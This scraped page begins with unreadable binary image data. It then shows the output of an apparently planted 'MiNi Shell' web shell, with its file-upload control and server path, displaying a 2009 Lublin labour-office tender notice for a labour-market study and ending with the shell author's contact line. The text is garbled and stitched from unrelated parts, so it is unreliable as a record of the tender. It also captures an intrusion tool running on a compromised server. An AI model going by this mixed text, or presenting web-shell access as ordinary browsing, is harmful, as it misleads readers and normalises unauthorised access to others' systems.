JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090417/110296-N-2009.html

<p class="kh_header"><b>Lublin: Badanie i analiza lokalnego rynku pracy na terenie Lublina w zakresie diagnozy stanu aktualnego jak i prognozy na lata 2009-2013 oraz opracowanie i publikacja ostatecznego raportu z przeprowadzonych badań i przygotowanie prezentacji multimedialnej.</b><br>
<b>Numer ogłoszenia: 110296 - 2009; data zamieszczenia: 17.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Urząd Pracy w Lublinie , ul. Niecała 14, 20-080 Lublin, woj. lubelskie, tel. 081 466 5200, faks 081466 5201.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mup.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Badanie i analiza lokalnego rynku pracy na terenie Lublina w zakresie diagnozy stanu aktualnego jak i prognozy na lata 2009-2013 oraz opracowanie i publikacja ostatecznego raportu z przeprowadzonych badań i przygotowanie prezentacji multimedialnej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa badania i analizy lokalnego rynku pracy na terenie Lublina w zakresie diagnozy stanu aktualnego jak i prognozy na lata 2009-2013 oraz opracowanie i publikacja ostatecznego raportu z przeprowadzonych badań i przygotowanie prezentacji multimedialnej. 
Wykonawca powinien dokonać opisu sytuacji na aktualnym rynku pracy miasta Lublina w ujęciu statystycznym (przedsiębiorcy i inni pracodawcy zatrudniający lub nie zatrudniający pracowników; opis branż z uwzględnieniem liczby zatrudnionych) oraz zawierającego inne elementy istotne dla analizy; 
Opis powinien uwzględniać elementy  demografii Lublina, osób czynnych zawodowo oraz biernych zawodowo.
Badanie będzie realizowane przez Wykonawcę dwuetapowo: 
- pierwszy etap - jakościowy, 
- drugi etap - ilościowy.

Miejsce badania: Miasto LUBLIN.
Opis respondentów podlegających badaniu:  
- pracodawcy [małe przedsiębiorstwa (zatrudniające od 9 do 49 pracowników), średnie przedsiębiorstwa (zatrudniające od 50 do 250 pracowników) i duże przedsiębiorstwa zatrudniające (powyżej 250 pracowników)] i inni pracodawcy nie będący przedsiębiorcą lub  
- ich pracownicy tj. osoby zajmujące się rekrutacją i zatrudnianiem pracowników, pracownicy działów kadr.
Wykonawca przeprowadzi badanie jakościowe w siedzibie respondenta metodą Indywidualnego Wywiadu Pogłębionego.
Liczba Indywidualnych Wywiadów Pogłębionych (IDI) -  ogółem trzydzieści (30) 
Wykonawca przeprowadzi badanie ilościowe  w siedzibie respondenta. 
Liczba wywiadów kwestionariuszowych - pięćset  wywiadów kwestionariuszowych 
(500 szt.).Wykonawca po ukończeniu kolejnych etapów badania musi dostarczyć Zamawiającemu zgodnie z Harmonogramem realizacji zamówienia , stanowiącym załącznik nr 1 do umowy, raporty.
Wykonawca zapewni wydanie i wydruk Ostatecznego raportu końcowego z całego projektu badawczego w formie publikacji książkowej w nakładzie 1000 egzemplarzy ,objętość od 150 do 300 stron (stopień czcionki 11 pkt i interlinia 13 pkt), oraz dostarczy Zamawiającemu raport w wersji elektronicznej w ilości 5 egzemplarzy na płycie CD lub DVD zapisany w dwóch formatach: PDF oraz w doc. lub rtf. Wykonawca przygotuje i dostarczy Zamawiającemu  prezentację multimedialną przedstawiającą wyniki przeprowadzonych przez Wykonawcę badań.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.31.00.00-0, 71.62.00.00-0, 79.97.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium 

1. Wadium w kwocie : 6000,00 PLN 

2. Wadium winno zostać wniesione  przed upływem terminu składania ofert.

3. Wadium może być wnoszone w następujących formach:

a) w pieniądzu,
b) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że  poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) w gwarancjach bankowych,
d) w gwarancjach ubezpieczeniowych,
e) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 
09 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).

4. W przypadku wnoszenia wadium w pieniądzu, ustaloną kwotę należy wpłacić przelewem na rachunek bankowy Zamawiającego numer Bank PKO.S.A V O.Lublin76 1240 1503 1111 0010 0585 9550
Dowód wniesienia wadium w pieniądzu musi zawierać w rubryce -tytułem- sformułowanie: -wadium w sprawie PK III 371- 72/09- i należy załączyć go do oferty w formie oryginału .

5. Dokument potwierdzający wniesienie wadium w jednej z form wymienionych w pkt 3 lit. : b), c), d), e) SIWZ musi być załączony do oferty w formie oryginału .

6. Nie wniesienie wadium w wymaganym terminie oraz wymaganej wysokości i formie skutkuje wykluczeniem Wykonawcy z postępowania.

7. Zamawiający zwróci niezwłocznie wadium, jeżeli:

a)	upłynął termin związania ofertą,
b)	zawarto umowę w sprawie zamówienia publicznego,
c)	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.

8. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.

9. Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy:
a) który wycofał ofertę przed upływem terminu składania ofert,
b) który został wykluczony z postępowania,
c) którego oferta została odrzucona.

10. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie pkt 9. lit: b) i c) SIWZ, jeżeli w wyniku ostatecznego rozstrzygnięcia  protestu unieważniono czynność wykluczenia Wykonawcy lub odrzucenia oferty. Wykonawcy wniosą wadium w terminie określonym przez Zamawiającego.

11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.

12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 , lub pełnomocnictw, chyba że udowodni , że wynika to z przyczyn nieleżących po jego stronie.

13. W przypadku wniesienia wadium w jednej z form określonych w pkt  3 lit. : b), c), d), e) SIWZ z treści dokumentu musi wynikać bezwarunkowa gwarancja wypłaty wadium na rzecz Zamawiającego w przypadkach przewidzianych ustawą z dnia 29 stycznia 2004 r. prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy:

8.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności objętych przedmiotem postępowania.

8.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
i  osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia .

8.3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

8.4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 

8.5 wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej   jedną usługę o wartości co najmniej 200 000,00 zł brutto odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia

W przypadku ubiegania się wspólnie przez Wykonawców o udzielenie zamówienia:
-   Zgodnie z art. 23 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych 
(tj. Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich  w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
-	Warunki udziału w postępowaniu określone w pkt 8.1, 8.4 powinien spełniać każdy Wykonawca z osobna, 
-	Warunki udziału w postępowaniu określone w pkt 8.2, 8.3, 8.5 Wykonawcy mogą spełniać łącznie. 

Ocena spełniania warunków udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia potwierdzające ich spełnienie zgodnie z formułą spełnia-nie spełnia.
Nie spełnienie jakiegokolwiek z ww warunków skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:

9.1 Oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie ze wzorem stanowiącym załącznik nr 1 do SIWZ.

9.2 Zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19. 05. 2006r. w sprawie rodzajów dokumentów jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane -Dz. U. z 2006 r. Nr 87, poz. 605 z późn. zm.- Zamawiający żąda w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę następujących dokumentów:
 
9.2.1 W celu potwierdzenia, że Wykonawca posiada uprawienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 prawo zamówień publicznych:

a.	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

9.2.2.	W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia:


a. wykaz  wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług odpowiadających swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że co najmniej 1 (jedna) z tych usług została wykonana należycie.
 
Dokumenty dołączone do wykazu mają dotyczyć usług wymienionych w wykazie.


9.3 W przypadku kiedy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów:
- o którym mowa w pkt 9.2.1. a - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Daty wystawienia dokumentów stosuje się odpowiednio.

9.4.  Wyżej wymienione dokumenty, sporządzone w języku obcym, Wykonawca  składa wraz z tłumaczeniem na język polski, poświadczone przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mup.lublin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Urząd Pracy w Lublinie
ul. Niecała 14, 20-080 Lublin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2009 godzina 10:00, miejsce: Miejski Urząd Pracy w Lublinie, ul. Niecała 14, pokój nr 13 (kancelaria).</p><p><b>IV.3.5) Termin związania ofertą:</b> do 28.05.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com